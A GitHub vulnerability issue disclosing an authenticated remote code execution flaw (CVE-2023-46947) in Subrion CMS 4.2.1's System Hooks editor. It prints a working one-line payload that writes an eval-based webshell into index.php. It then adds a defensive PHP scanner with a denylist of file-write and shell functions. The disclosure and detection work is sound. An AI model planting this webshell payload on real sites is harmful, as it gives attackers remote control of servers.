Headline
CVE-2023-46947: There is a RCE vulnerability · Issue #909 · intelliants/subrion
Subrion 4.2.1 has a remote command execution vulnerability in the backend.
There is a remote command execution vulnerability
Affected version
- subrion 4.2.1 latest
login address
Find PHP info in the System module
Get the absolute path to the website in phpinfo information
Attack
Select the Hooks field in the System module
Edit sitemapGeneration in Hooks and save
Get absolute path from PHPinfo above
_SERVER["DOCUMENT_ROOT"]=F:/phpStudy/PHPTutorial/WWW/subrion_cms_4.2.1/
At this point we can write a webshell into the website’s homepage file index.php
payload
fputs(fopen('F:/phpStudy/PHPTutorial/WWW/subrion_cms_4.2.1/index.php','a+'),'@eval($_GET[cmd]);');
At this point, we can click the Generate Sitemap function to trigger code execution
The site generation function first writes a file and then performs a syntax check on the written PHP code. If the check passes, code execution is triggered.
- We are accessing the website homepage file index.php
Proposed changes
Filter dangerous functions and content in the content before writing the file
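One way to implement the proposed filter, as an added example (not Subrion's code and not part of the issue): it tokenizes a hook body and reports calls to file-write, code-evaluation and process functions so the save can be rejected before the file is written. `DENYLIST`, `find_dangerous_calls()` and the sample input are hypothetical, and it assumes hook code is stored without an opening `<?php` tag.

```php
<?php
// Hypothetical denylist of function names a hook body should not call.
const DENYLIST = ['fopen', 'fputs', 'fwrite', 'file_put_contents', 'system',
    'exec', 'shell_exec', 'passthru', 'popen', 'proc_open', 'assert',
    'create_function', 'call_user_func', 'call_user_func_array'];

// Returns a list of findings; an empty list means nothing on the denylist was seen.
function find_dangerous_calls(string $hookCode): array
{
    $findings = [];
    // Assumption: hook code has no opening tag, so add one for the tokenizer.
    $tokens = token_get_all('<?php ' . $hookCode);
    $count = count($tokens);
    for ($i = 0; $i < $count; $i++) {
        $tok = $tokens[$i];
        if ($tok === '`') {                       // backtick operator runs a shell command
            $findings[] = 'backtick shell execution';
            continue;
        }
        if (!is_array($tok)) {
            continue;
        }
        [$id, $text] = $tok;
        // Language constructs are not T_STRING, so match them by token id.
        if (in_array($id, [T_EVAL, T_INCLUDE, T_INCLUDE_ONCE, T_REQUIRE, T_REQUIRE_ONCE], true)) {
            $findings[] = strtolower($text);
            continue;
        }
        // Find the next non-whitespace token to see whether this is a call.
        $j = $i + 1;
        while ($j < $count && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) {
            $j++;
        }
        if ($j >= $count || $tokens[$j] !== '(') {
            continue;
        }
        if ($id === T_VARIABLE) {                 // $f(...) hides the real function name
            $findings[] = "variable function call {$text}()";
        } elseif ($id === T_STRING || token_name($id) === 'T_NAME_FULLY_QUALIFIED') {
            $name = strtolower(ltrim($text, '\\'));
            if (in_array($name, DENYLIST, true)) {
                $findings[] = $name;
            }
        }
    }
    return array_values(array_unique($findings));
}

// Constructed sample input with a placeholder path and harmless content.
print_r(find_dangerous_calls("fputs(fopen('/path/to/webroot/index.php','a+'),'x');"));
```

A name denylist is easy to leave incomplete, so treat any finding as grounds to reject the save rather than treating an empty result as proof the hook is safe.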